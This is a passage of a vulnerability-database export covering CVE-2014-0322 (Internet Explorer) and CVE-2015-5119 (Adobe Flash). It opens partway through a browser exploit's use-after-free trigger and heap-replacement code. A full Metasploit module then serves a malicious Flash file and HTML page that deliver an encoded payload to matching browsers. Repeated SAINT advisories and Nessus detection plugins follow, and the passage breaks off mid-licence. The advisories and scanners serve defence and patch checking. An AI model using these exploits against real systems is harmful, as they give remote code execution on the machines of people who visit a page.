[eax+edx*8]\r\n\t\telse if (b.length == (0x15c / 2))\r\n\t\t{\r\n\t\t\tb += dword2data(0x42424242);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tb += dword2data(0x19fffff3);\r\n\t\t}\r\n\t}\r\n \r\n\tvar d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n\t// trigger\r\n\ttry{\r\n this.outerHTML=this.outerHTML\r\n } \r\n\tcatch(e){\r\n\t\t\r\n\t}\r\n\t\r\n CollectGarbage();\r\n\r\n\t// Replace freed object\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n\r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n}\r\n\r\n\r\n\r\n</script>\r\n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32851/"}, {"lastseen": "2016-02-04T06:01:36", "bulletinFamily": "exploit", "description": "Adobe Flash Player ByteArray Use After Free. CVE-2015-5119. Remote exploits for multiple platform", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "id": "EDB-ID:37523", "href": "https://www.exploit-db.com/exploits/37523/", "type": "exploitdb", "title": "Adobe Flash Player ByteArray Use After Free", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. This module has\r\n been tested successfully on:\r\n\r\n Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37523/"}], "saint": [{"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "id": "SAINT:D8D6BCBC7A7819EE47BC5E6D40059708", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:22", "bulletinFamily": "exploit", "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "id": "SAINT:6D3D943FE6C76C9CA78A9454A6931B44", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "id": "SAINT:4AA18219F0F43605A5B96CC5B2DF62FF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "type": "saint", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2017-10-29T13:37:32", "bulletinFamily": "scanner", "description": "The remote host is missing one of the workarounds referenced in KB 2934088. \n\nThe remote Internet Explorer install is affected by a use after free vulnerability in the MSHTML CMarkup component. By exploiting this flaw, a remote, unauthenticated attacker could execute arbitrary code on the remote host subject to the privileges of the user running the affected application.", "modified": "2017-08-30T00:00:00", "published": "2014-02-20T00:00:00", "id": "SMB_KB2934088.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72605", "type": "nessus", "title": "MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# @DEPRECATED@\n#\n# Disabled on 2014/03/11. Deprecated by smb_nt_ms14-012.nasl\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72605);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:47 $\");\n\n script_cve_id(\"CVE-2014-0322\");\n script_bugtraq_id(65551);\n script_osvdb_id(103354);\n script_xref(name:\"CERT\", value:\"732479\");\n script_xref(name:\"MSKB\", value:\"2934088\");\n\n script_name(english:\"MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution\");\n script_summary(english:\"Checks if workarounds referenced in KB article have been applied.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing one of the workarounds referenced in KB\n2934088. \n\nThe remote Internet Explorer install is affected by a use after free\nvulnerability in the MSHTML CMarkup component. By exploiting this flaw,\na remote, unauthenticated attacker could execute arbitrary code on the\nremote host subject to the privileges of the user running the affected\napplication.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2934088\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the IE settings workarounds suggested by Microsoft in the\nadvisory, or apply the MSHTML Shim workaround in the Microsoft\n'Fix it' solution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:W/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"microsoft_emet_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/IE/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Use plugin #72930 (smb_nt_ms14-012.nasl) instead.\");\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\n# only IE 9 and 10 affected\nversion = get_kb_item_or_exit(\"SMB/IE/Version\");\nv = split(version, sep:\".\", keep:FALSE);\nif (int(v[0]) != 9 && int(v[0]) != 10) audit(AUDIT_INST_VER_NOT_VULN, \"IE\", version);\n\nregistry_init();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{25408f0a-987b-4ab0-a5ac-2ddb89ff22cf}';\npath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\nRegCloseKey(handle:hklm);\n\nif (isnull(path)) path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n{\n hotfix_check_fversion_end();\n exit(0, \"The host is not affected since the Microsoft 'Fix it' has been applied.\");\n}\n\n# hotfix_file_exists calls NetUseDel(close:FALSE), so we must reconnect\nregistry_init();\n\nemet_info = '';\n\nemet_installed = FALSE;\nemet_with_ie = FALSE;\n\nif (!isnull(get_kb_item(\"SMB/Microsoft/EMET/Installed\")))\n emet_installed = TRUE;\n\n# Check if EMET is configured with IE.\n# The workaround does not specifically ask to enable DEP\n# but if IE is configured with EMET, dep is enabled by default.\n\nemet_list = get_kb_list(\"SMB/Microsoft/EMET/*\");\nif (!isnull(emet_list))\n{\n foreach entry (keys(emet_list))\n {\n if (\"iexplore.exe\" >< entry && \"/dep\" >< entry)\n {\n dep = get_kb_item(entry);\n if (!isnull(dep) && dep == 1)\n emet_with_ie = TRUE;\n }\n }\n}\n\nif (!emet_installed)\n{\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is not' +\n '\\n installed.';\n}\nelse if (emet_installed)\n{\n if (!emet_with_ie)\n {\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is' +\n '\\n installed, however Internet Explorer is not configured with EMET.';\n }\n}\n\ninfo_user_settings = '';\n\n# check mitigation per user\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nsubkeys = get_registry_subkeys(handle:hku, key:'');\n\nforeach key (subkeys)\n{\n if ('.DEFAULT' >< key || 'Classes' >< key ||\n key =~ \"^S-1-5-\\d{2}$\") # skip built-in accounts\n continue;\n\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n if (isnull(value) && isnull(value1))\n continue;\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n # \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (!mitigation)\n info_user_settings += '\\n ' + key + ' (Active Scripting Enabled)';\n}\n\nRegCloseKey(handle:hku);\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# check if user settings have been overridden by what is in HKLM\n# note: Security_HKLM_only can be set by group policy\nvalue = get_registry_value(handle:hklm, item:'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Security_HKLM_only');\n\nif (info_user_settings != '' && !isnull(value) && value == 1)\n{\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n # \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (mitigation)\n info_user_settings = '';\n}\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (info_user_settings != '')\n{\n port = kb_smb_transport();\n\n if (report_verbosity > 0)\n {\n if (emet_info != '')\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n' + emet_info + '\\n';\n else\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The host is not affected since a workaround has been applied.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:30", "bulletinFamily": "scanner", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to take over the system (bsc#937339).", "modified": "2018-07-30T00:00:00", "id": "OPENSUSE-2015-473.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84629", "published": "2015-07-09T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-473.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84629);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/07/30 11:55:12\");\n\n script_cve_id(\"CVE-2015-5119\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)\");\n script_summary(english:\"Check for the openSUSE-2015-473 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote\n attackers to take over the system (bsc#937339).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937339\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.481-2.61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:30", "bulletinFamily": "scanner", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been publicly published.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84628", "published": "2015-07-09T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS 